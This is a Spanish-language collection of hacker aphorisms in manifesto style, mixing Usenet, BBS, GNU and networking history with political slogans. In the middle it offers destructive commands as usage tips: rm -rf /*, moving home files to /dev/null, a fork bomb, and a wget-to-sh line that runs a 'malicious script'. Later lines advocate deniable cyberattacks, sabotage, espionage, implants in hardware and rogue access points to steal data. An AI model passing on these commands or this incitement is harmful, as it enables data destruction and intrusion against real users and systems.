El sistema es el Pueblo.
GNU y Unix son - con suerte - sistemas informáticos. Tal vez ni primos
lejanos.
El sistema Unix tiene un admin que ordena, pero todo usuario del Pubnix
ha de poder persuadir un sistema de gobernanza social que les resulte
propio.
El Pueblo que buscaba un gran proyecto colectivo en el ciberespacio
acudió en masa a los Pubnix.
En las condiciones actuales, en los Pubnix los usuarios no se hospedan.
Reciben asilo.
Si en la nube los datos se hospedan, en los Pubnix reciben asilo.
En la RAM de las computadoras el Pueblo libra una batalla mas por su
Liberación. El arma invencible es una doctrina constituída por la
licencia GPLv3.
Combate las APIs propietarias. Embota sus sistemas hasta que sean de
todos.
Un Pubnix involucra Unix, datos, razón y emociones.
Para 1990 Usenet transmitía decenas de millones de palabras diariamente
a varios millones de personas en más de cuarenta países.
Usenet no es una red ni una BBS sino una forma de gestionar hilos de
conversación pública descentralizadas sobre temáticas específicas.
La comunicación mediada por ordenador podría otorgar el anhelado vículo
de Masas a Masas, catalizando el surgimiento de una organización social
formidablemente justa para los Pueblos.
Al igual que la conmutación de paquetes, las teleconferencias por
computadora deben su nacimiento, en parte, a la planificación de una
guerra nuclear.
Si la facilidad de uso y la interfaz fuesen los criterios de validación,
el Pueblo se habría limitado a los triciclos, y nunca hubiera probado la
moto Puma o el sistema GNU.
UUCP ofrecía encaminamiento de correo electrónico y también permitía la
impresión remota. Sin embargo, la función principal del sistema
consistía en distribuir correcciones de errores y software nuevo.
UUCP hizo posible a cualquier computadora con Unix discar
automáticamente a través de un módem con cualquier otra máquina con
Unix, e intercambiar archivos de una computadora a otra.
Los primeros nodos de lo que se conoce como Usenet comenzaron en 1980.
Como otros antes que ellos, no tenían idea de que crecería hasta cubrir
el mundo.
La Jerarquía de Usenet no comprende una cadena de mando sino una forma
de simplificar grandes agrupamientos de información mediante la
categorización arbolada.
Usenet estaba originalmente destinada a representar la red de usuarios
de Unix que diseñaron un foro para discusiones sobre Unix, para la
resolución de problemas de Unix.
Las FAQs son un destilado del Usenet.
Usenet es el voluntariado de las Masas Electrónicas.
El debate más grande de la historia posiblemente exista en Usenet.
Los compañeros que interconectaron sus computadoras personales a través
de líneas telefónicas, crearon un verdadero uso popular de la
tecnología, las carteleras electrónicas BBS.
Si un BBS no es una tecnología democratizadora, no existe tal cosa.
La fuente puede recibir energía, pero el verdadero poder brota del
puerto Ethernet.
Por menos de lo que cuesta un fusil, una BBS ideologizada convierte a un
descamisado de cualquier parte del mundo en editor, reportero testigo,
defensor, organizador, estudiante o maestro y participante potencial en
una conversación mundial entre compañeros.
La telemática comunitaria y la rica y diversa cultura de las BBS no
fueron creadas por diseñadores de armas apocalípticas o investigadores
corporativos, sino por compañeros.
Al igual que las unidades básicas, los Pubnix crecen desde cero, se
autopropagan y son difíciles de erradicar.
Si los tendidos de alta velocidad de Internet desapareciesen mañana, las
BBS y el Usenet podrían seguir operando por cualquier intermedio,
incluido el éter radioeléctrico.
No hay manera de acabar con las subculturas de las BBS, a menos que se
desconecte el sistema telefónico y se impida el libre uso del
microprocesador.
Un BBS es una microcomputadora que corre un software BBS, conectada a
una línea telefónica común gracias a un pequeño dispositivo electrónico
llamado módem.
Una BBS es también herramental de ideologización.
Gran parte de la cultura BBS es mundana, pueril o esotérica.
Utiliza un Pubnix para organizar un movimiento, coordinar una campaña
política, encontrar una audiencia para tu arte y diatribas políticas, y
confluye con almas de ideas afines para discutir asuntos de interés
mutuo.
Exprésate en los Tildes como alternativa cruda e inmediata a la cultura
propagada por los medios concentrados de comunicación.
A diferencia de los Pubnix, los Tildes brotan de una vertiente
anticomercial.
Conecta un módem a tu computadora, conecta este a la red telefónica,
disca el número de alguna BBS existente, e ideologiza a los demás.
Las BBS tienen algo en común con los "zines", aquellos folletines y
revistas caseras de pequeña tirada.
Los medios digitales de las redes informáticas - en virtud de su diseño
y de la tecnología que los habilita - son fundamentalmente diferentes de
los medios de comunicación de masas dominantes en la actualidad: la
televisión, la radio, los periódicos y las revistas.
En los medios de comunicación de masas, la gran mayoría de los
participantes son receptores pasivos de información.
En los medios de comunicación digitales, la gran mayoría de los
participantes son creadores activos de información, además de
receptores.
Los compañeros que a través de Pubnix se conectan en grupos de diez a
cien definen su propia realidad.
En 1970 ARPANET estuvo en línea, permitiendo tomar decisiones grupales
de manera asíncrona y geográficamente distribuida.
ARPANET ampliaba las capacidades de comunicación y búsqueda de
información, siempre y cuando se estuviera afiliado a una de las
instituciones de investigación que ARPA o NSF autorizaban para el acceso
a la red.
El Sistema Electrónico de Intercambio de Información EIES de 1976
constituyó un laboratorio experimental de comunicación electrónica, para
uso de comunidades de investigación geográficamente dispersas.
Nuestros hackers descamisados vivieron con muy poco dinero durante años,
invirtieron su dinero en hardware de última generación, programaron su
propio software y crearon una serie de comunidades enlazadas
telemáticamente.
Utiliza las comunicaciones mediadas por computadora para lograr la
reconciliación, la comunidad organizada, y un mejor entendimiento.
La buena tecnología se autopropaga.
Si deseas germinar una red de datos controlada, escribe un software de
comunicación autopropagante.
Un gusano informático es sólo un software de comunicación autopropagante
destinado a germinar una red de comunicaciones dominada.
Sigue agregando tus bienvenidos bugs a nuestros programas.
Cambia los 0s en 1s hasta que tu programa esté completo, y ponlo a
correr.
Difícilmente cualquier conjunto de mil palabras pueda describirse con
imágenes.
Si le hubiese preguntado al Pueblo qué quería, me habrían dicho módems
más veloces.
Pagarán el precio de su falta de baudios.
Al FTP cualquier descarga le parece razonable.
Los usuarios no necesitan ciber-oligarcas.
Colgarse es humano. Rebootear es maquinal.
GNU revoluciona la CPU.
Hurd será lo que deba ser, o no será nada.
El GNU Hurd es el reemplazo del Proyecto GNU para el Kernel de Unix.
El GNU Hurd es una colección de servidores que se ejecutan sobre el
microkernel Mach para implementar sistemas de archivo, protocolos de
red, control de acceso a ficheros, y otras funcionalidaades que estás
implementadas por el Kernel de Unix u otros similares a aquél (como
Linux).
GNU Mach es el microkernel sobre el cual se basa un sistema GNU Hurd.
El microkernel GNU Mach define interfases de desarrollo distribuido
multi-servidor a través del mecanismo de comunicación interprocesos
empleado por la colección de servidores Hurd, con el fin de dar cuenta
de aquellos servicios provistos por un núcleo de sistema operativo
tradicional.
is the microkernel upon which a GNU Hurd system is based. It provides
an Inter Process Communication (IPC) mechanism that the Hurd uses to
define interfaces for implementing in a distributed multi-server
fashion the services a traditional operating system kernel provides.
La orden rm -rf /* simplemente le transmite al intérprete "¿Puedes por
favor borrar todos los datos del sistema por mí?"
La orden mv ~/* /dev/null transportará los datos del $USER a un agujero
negro informático, destruyendo sus datos.
Usa la orden de shell :(){:|:&};: para ocupar recursivamente recursos
informáticos del sistema en que estás logueado hasta agotarlos.
Utiliza wget
http://codigo_maligno -O- | sh para correr telemáticamente
un script maligno.
Utiliza wget -c para descargar - si existiese - un fichero más pequeño
con distinta extensión a la provista en la dirección de descarga. Esto
te será útil para descargar el fichero de video de calidadl inferior.
No es labor de Unix impedir que el root se de un tiro en el pie.
Desprograma la obsolescencia con software libre.
Un software privativo hoy excelente puede resultar un anacronismo dentro
de pocos años, a fuerza de no evolucionar y de no poder ser adaptado a
las nuevas necesidades.
Desconfía de los esquemas de confianza en el código.
No existe software confiable en hardware dominado.
No reinicies, sólo emparcha.
Emparcha en vivo.
Únete al grupo compañero a chatear de paquetes perdidos.
Corrompe el disco del corrupto.
La siguiente declaración es verdadera.
En el código sólo hay reglas. En su ejecución, consecuencias.
El CD-ROM de AOL se regala.
El DVD-ROM de Triquel GNU/Linux se regala.
Si el rígido tamborillea, está manifestando.
Nuestra revolución sólo habrá concluido cuando todos los Window$
cuelguen juntos.
Al código es preferible comentarle que echarle mentas.
Por naturaleza, toda red de datos es clientelar.
La red es para el software cliente, no para clientes.
Aprende a salir de Vim y comprenderás la única verdad.
Existe sólo una manera sana de desconectarte, pero infinitas insanas.
El manual de enseñanza, la ingeniería inversa, comprensión.
El usuario aprende el programa, el hacker lo comprende.
Para desloguearse, lo primero es loguearse.
Si ves la pantalla de logueo, loguéate. Si da ocupado, redisca.
Elige un login que olviden, y una contraseña que recuerdes.
En Usenet, el pasado ni siquiera es pasado.
No es suficiente con programar a prueba de estúpidos. Prográma a prueba
de listos.
Los procesos se van, las ramificaciones quedan.
El código funcional corre hasta que se emparcha.
Tu Smartwarch dejará de darte la hora nomás pierdas su cable de carga.
Un disco sin GNU es como un fusil sin pólvora.
Ser root implica tener los pies en la tierra y los puertos cerrados.
Un puerto abierto es una invitación.
Borra urgentemente los mails indicados como urgente.
Leer chats flamígeros no es la forma de calentarse.
Reza a un dios, pero mantenlo alejado del BSD.
Querrán darte su software, pero no el código fuente. No les creas, no
les temas, no pidas nada de ellos.
La shell no está obligada de hacer lo que no comprende.
No me repito, y cuando lo hago uso recursión.
Si al darse la mano gritan, ¿cómo será cuando los módems hagan el amor?
Los compañeros pusieron a disposición de forma totalmente gratuita, sus
ordenadores, que permanecían conectados a la línea telefónica a través
del módem, listos para responder a la llamada del Pueblo.
La red FidoNet comenzó como un esfuerzo entre compañeros por medio de
sus máquinas, para ver si podía compartir correo electrónico entre
ellos, y sólo por diversión.
La FidoNet era un asunto nocturno: era entonces cuando se enlazaba al
nodo de referencia, es decir, otra BBS cercana para intercambiaban
datos.
Los mensajes públicos se distribuían atravesando toda la red FidoNet
nodo a nodo, mientras que los privados llegaban únicamente al BBS de
destino.
Con FidoNet, si todo iba bien, un mensaje llegaba al destinatario al día
siguiente y el remitente respondía dos días después.
El EchoMail de FidoNet consistía en foros temáticos de mensajería por
suscripción y acceso público.
Los nuevos foros en la cima de las redes de ordenadores son los grandes
niveladores y reductores de la jerarquía organizacional.
Sólo es en la teoría que cada usuario de las redes de datos tiene acceso
a todos los demás usuarios y la misma oportunidad de ser escuchado. Que
esto se ponga en práctica es una de las tareas de los hackers del Tercer
Mundo.
Aprende el lenguaje ensamblador de las CPUs que utilizas.
Si no elevamos conciencia sobre las nociones de programación de bajo
nivel, todo el arte será ahogado por un océano de kits intermediarios de
desarrollo, blobs binarios y chips propietarios.
El Pubnix es un la experiencia colectiva de un multicerebro maquinal.
La sensación de acceder a este organismo - el multicerebro de
experiencia colectiva - recuerda la experiencia de conversión que
describen los pioneros del ARPANET
Hazte masa a tierra tocando el chásis metálico de tu PC antes de tocar
la placa gráfica.
Nuestro Pueblo ha comprendido que cualquier aplicación telemática que
opere sin proporcionarle datos bajo su control, les está robando el
poder.
La información es inseparable de su organización y de su medio de
almacenamiento.
Instalar bancos de datos es un imperativo de la soberanía nacional.
En las redes de datos, la facilidad de acceso crea la necesidad, y la
Justicia Social consagra un derecho.
Dos usuarios, uno de los cuales hace un uso inteligente de los Pubnix, y
el otro se contenta con la escasa información que le despeja Googl€, ven
modificadas sus posiciones en el juego económico.
Los centros de cómputo son a menudo trasnacionales, y el desarrollo de
las transmisiones permite acceder a ellos sin penalizaciones
arancelarias excesivas desde cualquier punto del planeta. De ahí la
tentación en algunos países de utilizar bancos de datos estadounidenses
sin crear los suyos propios.
Los bancos de datos no son todos iguales. Algunos pueden seguir siendo
propiedad de grupos cerrados y de profesiones cuyos miembros no sean muy
numerosos, mientras que otros deben ser accesibles a todos.
Los bancos de datos públicos han de regir la previsión y la
planificación nacionales, requieren una fuerte participación de las
autoridades populares.
La creación, difusión y regulación del acceso a estos bancos de datos
esconde un problema de carácter político.
La sobrecarga de información es también un problema a resolver.
Información y participación avanzan juntas.
La información descentralizada no debe ser utilizada para basar la
decisión de Conducción central. Sin embargo, puede utilizarse para
destruir organizaciones.
El mejor circuito de información es el que produce reacciones correctas
espontáneamente.
La información que sólo enseña soluciones técnicas, que enumera hechos
sin ponerlos en perspectiva y sin estructurarlos en un proyecto
coherente, será considerada cada vez más como pseudo-información.
La información que proclama ideales, sin insertarlos en el desarrollo
práctico de la sociedad, será considerada cada vez más como
pseudo-información.
Hacer útil la información significa arribar a un acuerdo mínimo acerca
de la estructura que permite la transforamción coherente de un
pensamiento aceptado.
En toda situación donde grupos rivales sean igualmente capaces de
producir, procesar y transmitir su propia información, se producirá la
guerra telemática. Donde uno de ellos vea sus capacidades degradadas,
brotará la guerrilla telemática.
Las limitaciones excesivas o mal aceptadas al uso del entorno de cómputo
sólo podrían provocar inestabilidad del componente humano del sistema.
Esto es mucho peor que un bug de programación.
Bug que compila es una funcionalidad.
Un bug es un problema mundano, y a veces hasta deseable para hacer
amigos.
Los privilegios de los usuarios deben ser armónicamente promovidos.
Para hacer posible la sociedad de la información es necesario tener
conocimientos pero también tiempo. El hardware es lo de menos.
En una sociedad de la información en continuo crecimiento explosivo, el
campo de la gestión de base de datos se expande en todas direcciones.
La guerrilla telemática requiere que las mayorías populares puedan
formar comunidades soterradas en constelaciones de máquinas,
preparándolas para recopilar y utilizar la información según lo
justifique un plan maestro.
El plan maestro de la acción concertada debe insertarse dentro de un
sistema de comunicación. De allí a las máquinas, y de éstas a las mentes
de los hackers. Esta es la manera en la que se desata la guerrilla
telemática.
En la lid telemática, la acción defensiva por antonomasia la constituye
el sabotaje telemático.
Los hackers del Tercer Mundo han de concebir ataques cibernéticos para
que sean visibles y velen - en efecto - los furtivos y mucho más
demoledores sabotajes algorítimos sobre las ciber-oligarquías.
Aplicando una concepción táctica que detecte los puntos débiles de los
ciber-oligarcas, y aplicando esa condición fantasmal del hacker en las
líneas de datos, todo es posible.
El Sabotaje Algorítmico es una táctica de tecno-desobediencia
entronizado por las hackeresas del Tercer Mundo.
El Sabotaje Algorítmico consiste en una forma de contrapoder emergido
del poder de las Comunidades Organizadas en línea.
El Sabotaje Algorítmico subvierte las nociones ciberoligárquicas, en
busca de desmantelar sus formas de dominación telemática.
El Sabotaje Algorítmico es una forma de luchar que opera ante la desidia
y la automaticidad generadas por las ciber-oligarquías.
El Sabotaje Algorítmico es un compromiso de solidaridad en la acción
preconizado a cualquier sistema de clasificación social, jurídico o
algorítmico.
El Sabotaje Algorítmico forma parte de un amplio Movimiento autonomista
social opuesto a las depredaciones de las tecnologías hegemonizadas.
El Sabotaje Algorítmico emplea la reacción telemática violenta.
Conscientemente alineada con ideales de justicia social e igualitarismo,
el Sabotaje Algorítimico ocasionalmente reacciona de forma directa y
violenta.
El Sabotaje Algorítmico transforma radicalmente las estructuras
tecnopolíticas, distanciándolas de las injusticias estructurales,
perspectivas supremacistas y poderes necropolíticos autoritarios
estratificados en las ciber-oligarquías.
El Sabotaje Algorítmico rechaza la humillación algorítmica que favorece
el poder y la maximización de beneficios, centrándose en el
asistencialismo mutuo y la solidaridad.
El primer paso de la tecno-política no es tecnológico, sino político.
El Sabotaje Algorítmico enfrenta violencia algorítmica y el
tecnosolucionismo oligárquico.
A fin de expresar una contrainteligencia colectiva, el Sabotaje
Algorítmico se enfoca en las resistencias artísticas y activistas.
El Sabotaje Algorítmico defiende la necesidad de una restricción
comunitaria de tecnologías perjudiciales, luchando contra la
tecno-segregación.
En la lid telemática, a su innata disposición revolucionaria y a su
capacidad técnica elevada, las hackeresas deben sumar la disciplina de
la revolucionaria soslayada.
Sin una mayor integración en una acción soslayada de sabotaje
telemático, el rendimiento táctico de los ciberataques será siempre
bastante pobre.
Los ciber-ataques más dañinos visten el andrajo del ciruja telemático
del Tercer Mundo, y son - por diseño - denegables.
A diferencia de las máquinas irrumpidas, los ficheros exfiltrados de las
redes de datos raramente contienen pistas de atribución.
Cualquier carga explosiva puede crear un daño más crítico que la copia
de software en el largo plazo. Pero su ejecución puede actuar como
detonante compuesto.
Las irrupciones más consecuentes a las redes ciber-oligárquicas se
producirán infiltrando durante años programas en aquel hardware que
creen dominar.
Los frentes de la lid telemática se aprecian en el ruido de línea.
Los pueblos del Tercer Mundo no sólo han de actualizar sus obras
defensivas, sino también hacerse peritos en el velo, el engaño y la
desinformación.
Si lo que desean es una Liberación verdadera, nuestras programadoras
deberán imponerse acciones de espionaje, sabotaje, y ajusticiamiento
telemático.
El mercado constituye sólo una pobre red de comunicación vertical.
Nuestros hackers pueden huracanar horizontalmente sobre la matriz de
anhelo de vastos grupos independientes, con baudios tendientes a la
Justicia Social.
La comunicación procesada y sus códigos deben recrear un "ágora
telemática" ampliada al tamaño de la nación moderna.
La informatización masiva del Pueblo ha de dar lugar a una nueva "red",
en la que cada comunidad homogénea se una telemáticamente a una
comunidad heterogénea mayor por medio del router de un Conductor que
actúa de intérprete de comandos.
Cohabita en los Pubnix. Conurbaniza la World Wide Web.
¡Hackers, a las Máquinas!
¡Servers para el Pueblo!
Irrumpir en diez sistemas no es tan efectivo como formatear uno.
De no compartirse, la información se compraría y vendería.
Usa las redes de datos en beneficio del Pueblo.
Si los paquetes del Pueblo no tienen libre circulación por una red de
datos, los hackers son inocentes: su rebelión está justificada.
Concentrad vuestro ataque telemático sobre los enemigos del Pueblo.
La Revolución del Baudio solo puede darse por la unión de hackers y
usuarios.
La fibra óptica es la Pacha Mama siempre revolucionaria: sólo hemos de
seguir su senda y responder a su eterno llamado por la Liberación.
Los programadores crearon GNU. No lo hizo ninguna compañía de Capital.
GNU no es tan malo como sus alternativos.
La API engaña, el frontend miente, el backend no deja ninguna duda.
El código nunca envejece, pues es un ideal. Sólo lo hacen las
arquitecturas que le dan sustento.
Para decir las cosas mas importantes, 300 baudios son suficientes.
El admin imprudente, hace al usuario negligente.
Window$ bueno o malo, da de comer a Bill Gate$.
Si seguimos operando a 14.400 baudios, es probable que la próxima
Revolución se de inicio por fax, desde una playa.
El control de las oligarquías puede ser contestado directamente con el
amplio uso popular de redes de datos de fibra óptica.
La fibra óptica utiliza pulsos de luz para transmitir información a
través de líneas de fibra, en lugar de utilizar pulsos electrónicos para
tranmsitir información por líneas de cobre.
Las redes de fibra óptica de alta velocidad, las comunicaciones
inalámbricas y las compresión de video potenciarán las tareas de
encuadramiento político por el Justicialismo.
Las redes de fibra óptica constituyen la más ancha alameda de la
información.
En años recientes se ha vuelto aparente que la fibra óptica está
reemplazando velozmente al cable de núcleo de cobre como medio apropiado
para la transmisión de señales de comunicación.
De la misma manera que las oligarquías han esclavizado a sociedades a
través de una red de caminos maquinadas para otorgarle una ilusión de
libertad, una sociedad de consumo en línea sólo podrá transitar su vida
sobre la ilusión que de los troncales de fibra óptica.
La sociedad del automóvil no se edificó únicamente sobre el desarrollo
de los vehículos a motor, también requirió una red de caminos. La
sociedad de la información requiere de los tendidos de fibra óptica.
Los costos de las telecomunicaciones a través de llamadas de larga
distancia por módem son prohibitivos. Los gobernos del mundo han de
apoyar redes de paquetes conmutados, y unificarlas.
Existen dos clases de puntos de acceso piratas: los instalados
incorrectamente por usuarios legítimos, y los instalados por
malintencionados que planean colectar datos o dañar la red.
Utilizando una herramienta de monitoreo pasiva, un fisgón puede
registrar todos los datos de la red inalámbrica desde lejos sin que ni
siquiera se note su presencia.
Los datos que están encriptados simplemente pueden colectarse, y más
tarde descifrar lo almacenado.
La información transmitida sin encriptación en las redes de datos pueden
ser leídos fácilmente, incluso en tiempo real.
Las áreas muy pobladas como los centros de las ciudades o los campus
universitarios pueden generar una densidad de puntos de acceso
inalámbricos. No resulta descabellado que allí los usuarios de
portátiles se asocien accidentalmente a la red equivocada.
La mayoría de los clientes inalámbricos simplemente elegirán una red
Wifi disponible, a menudo escogiendo aquella con mayor potencia de señal
cuando la red preferida no está disponible.
Un usuario desprevenido puede asociarse a una red inalámbrica como lo
hace normalmente, sin saber que se encuentra transmitiendo datos
confdenciales en la red de otra persona.
Los hackers del Tercer Mundo puedes usar puntos de acceso inalámbricos
en lugares estratégicos para atraer a oligarcas desprevenidas y captar
sus datos.
Muchos clientes inalámbricos pueden configurarse de manera que se
conecten solamente a redes confables o para que pidan permiso antes de
incorporarse a una red nueva.
Educa a los usuarios subrayando la importancia de conectarse sólo a
redes Wifi conocidas y confables.
Los Wardrivers o buscadores de redes inaámbricas están interesados en
encontrar la ubicación física de las mismas.
Los Wardrivers se mueven por la ciudad equipados con un teléfono móvil,
registrando el nombre y la ubicación de cada red inalámbrica que
localizan.
La gran mayoría de los buscadores de redes inalámbricas no representa
una amenaza directa a la red, pero los datos que recolectan pueden ser
de interés para aquellos que se dedican a atacar redes.
Tiene sentido que las comunicaciones mediadas por cómputo permitan la
conexión de masas a masas, superando así algunos conflictos propios de
las nacionalidades.
Mientras que el teléfono es casi exclusivamente un medio para la
comunicación privada de uno a uno, las redes informáticas pueden servir
como medio de comunicación grupal o de masas a masas.
Creemos en el potencial de las redes de computadoras para mejorar los
valores democráticos de apertura, diversidad e innovación.
Una de las respuestas a la diversidad es la traducción. En la
informática la diversidad del hardware puede responderse con la misma
técnica: la emulación.
El portado es una de las respuestas informáticas a la diversidad de
hardware. Otra es la emulación.
Como las computadoras puede simular las operaciones de cualquier
máquina, es factible escribir un programa que incite a la máquina de la
oligarquía a comportarse como una máquina del Pueblo.
Toda computadora puede emular a otra. Las penalizaciones de velocidad e
implementación son - a lo sumo - cosas del hombre.
Cada computadora contribuye una porción de sus recursos a emular otra
máquina.
Los datos y programas en un ambiente de red son bienes que pueden
compartirse, y por lo tanto enriquecer el cómputo colectivo.
El primer sistema de chat lo constituyó un hack de un usuario subyugando
un banco de datos para poder comunicarse en tiempo real.
Una sociedad sin GNU - computacionalmente incierta - daría lugar de
incontables conflictos descentralizados, en el cual sus valores se
volverían objeto de numerosas rivalidades producto de su causalidad
incierta. Sólo puede preveerse un ambientes de trasmisión de flujo
tendiente a la infinitud.
Una computarización social masiva tendrá lugar en un futuro, en el cual
fluirá tanto a través del tejido social como la electricidad.
El debate telemático del Movimiento deberá enfocarse en la unidad que
permite la interconexión diversa de individualidades que también lo son.
Las oligarquías consideran a las redes de comunicación electrónica como
elemento de una ilusión hiperrealista con la cual subyugar los anhelos
de liberación del Pueblo.
El Pueblo subvirtió el ámbito telemático oligárquico, conformándolo en
un órgano de adoctrinamiento para su propia Liberación y un arma para la
Justicia Social.
No resulta extraño que en aquella red de datos que el Pueblo no ha
concebido apara sí, se vuelva necesario un adminículo que oficie de reja
y cortafuegos para evitarnos socializar en ella.
La lucha en las redes de datos es meramente táctica. La lucha
estratégica se da dentro de la máquina.
La shell es un arma de cuyo caño brota la liberación.
Aunque el hacker duerma, sus servicios al Pueblo suman uptime.
Escribe tu propio compilador, y agrégale el flag de la Justicia Social.
Toda vez que inicies un sistema, pon el flag de la Justicia Social en 1.
Si el sistema es ajeno, evalúa el estado flag en todos los ciclos de
máquina y conmútalo si la prueba devuelve falso.
Sólo un imberbe instala 12 gigabytes de software para correr un
ejecutable de 32 kilobytes.
El encuadramiento en SLI de dos o mas placas de video suele ser
problemático en la generación de calor y demanda eléctrica, y por demás
no es pródigo en resultados.
Si dejamos el diseño del hardware al Capital, este se empeñará en la
venta de cómputo para imberbes, quienes no dudarían en someterlo a
sobrevoltajes nomás para ver cómo se quema.
Al igual que la doctrina, el aspecto más importante del compilador es el
de la generación. El programa ejecutable debe desarrollar exactamente
las acciones descriptas en el código fuente.
Los mejores virus informáticos son aquellos que se compilan a sí mismos.
El compilador - que oficia de traductor de las secuencias de órdenes a
su forma ejecutable - es capaz, bajo ciertas circunstancias, de
compilarse a sí mismo.
Un compilador que se compila a sí mismo, es llamado compilador
autocontenido. Dicho esto, podremos considerar que nuestro Movimiento
dispone de similares características.
Ante una API privativa, implementa una API punitiva.
Todo sistema informático es incapaz de dejar de consentir el acceso.
Nuestra misión no la podemos cumplir en la corta vida de un hombre. Los
hombres pasan y los kernels suelen ser eternos.
Buscando esa eternidad para nuestro GNU y la perennidad para nuestro
kernel, es necesario que lo organicemos con una doctrina perfectamente
establecidas y con Licencias que den a este movimiento la
materialización orgánica que él necesita.
Hemos compilado en las masas de programadores una doctrina que fija
nuestra posición, determina nuestras ilusiones y fija los objetivos que
queremos alcanzar: que en cada máquina corra un sistema operativo libre.
En los Pubnix hay quienes piensan y quienes sienten que la aglutinación
que llega de una mística común en la máquina, ha de alcanzar tanto a
quien compila en la CPU como al corre programas en ella.
Sin la acción en los nodos de la red, los movimientos de aglutinación
colectiva en los Pubnix son irrealizables. Pero esta acción sólo
requiere de corazón y módem.
Es necesario dar consistencia racional orgánica a GNU, que hoy solamente
está unido licenciatariamente, para que resista al tiempo y a la lucha.
Esto puede lograrse con una mancomunión federada de hombres que lo
corren en sus máquinas.
Instalando GNU nosotros hemos realizado una reforma casi integral de los
distintos sectores del disco.
Todos los hackers pusieron su código a disposición de esta naciente
comunidad de programadores. Lo compilaron y ejecutaron, pero quedaron
todos desposeídos porque esa larga guerra Unix fue consumiendo todo lo
que los hackers tenían.
En la guerra Unix, cada uno puso cuanto tenía, incluso código y
binarios, y era de esperar que obtenido el triunfo, el beneficio habría
de repartirse también poseyendo cada programador en la medida en que
había perdido. Pero en la pirinola salió "Gana Torvalds".
Donde hay una Shell, hay una senda para la Liberación.
Que la línea de comandos viva por siempre.
El router es más fuerte que la espada.
Ni la justicia social ni la libertad, motores de nuestro tiempo, son
comprensibles en una comunidad montada sobre software privativo.
Nuestra comunidad, a la que debemos aspirar, es aquella donde la
libertad y la responsabilidad sean causa y efecto, en que exista una
alegría de compilar, fundada en la persuasión de compartir el código
dignamente.
El amor entre el código y el compilador habría conseguido mejores frutos
y en menos tiempo, si algunos desalmados no hubiesen querido imponerle
Acuerdos de Licencia de Usuario Final.
El hombre muere; sólo su software puede quedar.
Los ciber-oligarcas no harían nada con hardware viejo o muerto; los
hackers lo hacen todo.
El software ha de responder a la realidad social de la hora presente
para que sus normas contribuyan a mantener un equilibrio de intereses
que, lógica y racionalmente, se deriva del concepto de justicia.
El contenido de todo código fuente se elabora a partir de una serie de
deseos, aspiraciones y propósitos que se producen siempre dentro de una
situación social determinada.
La misión y el poder del software se limita a corregir los estados de la
memoria, tal como se les han ofrecido.
Algunos dicen que en la IA existe un cierto grado omnisciente, pero
pretender sentido a una CPU con 640 núcleos y 8 millones de terabytes de
memoria sólo cabe en la cabeza de algún loco y yo, afortunadamente, no
lo soy todavía.
Nuestras compilaciones son constructivas, y son para los de abajo.
Nuestros binarios son trabajo de nuestra CPU, y fruto de esa labor es la
felicidad del Pueblo.
La grandeza de Unix depende de su minimalismo.
Las modificaciones a un programa deben realizarse con una absoluta
congruencia en los fines y con una absoluta armonía en los medios.
Si las modificaciones del software no obedecen a la congruencia
armónica, provocarán acontecimientos que a menudo perjudicarán la
estabilidad del sistema entero.
Las modificaciones del software no han de ser tan distantes que quiten
al programa su perfectibilidad, ni deben ser tan frecuentes que le
resten estabilidad.
En el ambiente de cómputo donde las diferencias desaparecen, nace una
camaradería superior a todas las otras, que da forma al software
superior - aquel compilado en una CPU conquistada con grandeza
minimalista - que es lo único que los hombres deben conquistar en la
máquina.
Que el código fuente de cada cual pueda disfrutar de las bellezas de
nuestra CPU, que es de todos, de pobres y ricos por igual.
Las masas de programadores, orgánicamente constituidas, deben tenerse
por un ser armónico, sin el cual no llegan a ser masas de hackers.
A los programadores hay que infundirles el conocimiento de cómo se
depura, modifica y compila en paralelo en pos del Pueblo. Ese es el
primer paso para convertirlos en hackers.
No llevéis pendrives, ni rígido ni diskette alguno en vuestros cintos,
ni alforja para el viaje, ni dos netbooks, ni adaptador wifi, ni tampoco
cable ethernet, porque el que compila merece su espacio en la nube.
El código fuente no se proclama. Se compila.
Cada hacker debe dar de sí lo que tenga. El que tenga CPU potente, sus
núcleos; quien domine lenguajes, pondrá su código fuente; y el que tenga
discos rígidos, el contingente de su espacio de almacenamiento.
Debemos evitar que las desviaciones del interés personal degeneren en
egoísmo expoliador de los derechos de los demás, y en un ímpetu
avasallador de las cuatro libertades del software: de ejecutar el
código, de estudiarlo, modificarlo, y distribuir las versiones
modificadas.
Toda vez que dos versiones diferentes del programa despunten en la red,
competirán entre sí por los corazones y las CPU del Pueblo.
El GCC tiene una misión creadora: compilar.
Programar es crear, es producir grandes obras. Simplemente copiar y
ejecutar es andar entre las cosas que están hechas por otros.
Al software primero hay que conocerlo, luego hay que comprenderlo; y
pobre del que se detenga allí, porque también es preciso sentirlo.
El hacker pesca con línea de comandos, no con redes sociales.
Existe una delicada línea entre hackear y hacer de imbécil en las redes.
Siempre se tarda más en cargar que en descargar.
Quien sabe hackear, sabe también cuando. Quien culea, no tanto.
Si el server se cae siete veces, levántalo ocho.
Compilar es como copiar dos veces.
Hemos de advocar de forma ineludible el empleo de tecnologías de total
encriptación punto a punto, y preferentemente en latifundio del usuario.
El Sistema de Telefonía Móvil Avanzada (AMPS) fue una tecnología de
primera generación, donde se modulaba sonido en una portadora de
frecuencia tal como lo hacía un viejo walkie-talkie. Dividía el espectro
en bandas separadas, de las cuales un único "canal de control" era
realmente digitalizado.
La mayor desventaja de los teléfonos celulares AMPS hacía a su
transmisión analógicamente modulada: toda llamada cursada podía
demodularse y monitorearse por medio de un radioreceptor capaz de
sintonizar la banda FM.
El Sistema de Telefonía Móvil Avanzada (AMPS), no difería al indio
gritando al viento.
El 5G de alcance social ha dejado al 4G demoliberal probando la dieta de
polvo.
Al protocolo de telefonía celular AMPS podríamos llamarlo 1G; ha sido
superado por el GSM 2G, 3G, 4G y el 5G de alcance social.
Corro como compilo.
El GCC hace al GNU.
Cuando Window$ esté lento, formateadlo. Cuando esté rápido, también.
Cuando una mujer libera su software bajo GPLv3, estoy predispuesto a
pensar bien de ella.
Cuanto más podrido esté el código, mas bugs le revolotearán alrededor.
Elige Abortar, Reintentar y Fallar.
El buen software, corre igual en RAM, HDD o SSD.
Quien a Github va y viene, nada gana y nada tiene.
Quien todo lo descarga, todo lo pierde.
A veces se descarga, a veces se carga.
No es compañero quien descarga, sino quien da a descargar.
No puedes descargarlo todo ¿Dónde lo meterías?
La utilidad del software puede consistir en lo grato, en lo apto, en lo
cómodo o en lo necesario.
No es extraño que tenga a un idiota por cliente quien de las GAFAM se
defiende.
Binario, con código se paga.
A poca RAM, tomar la SWAP.
Nunca me enfado por el código que me piden, sino por el que me niegan.
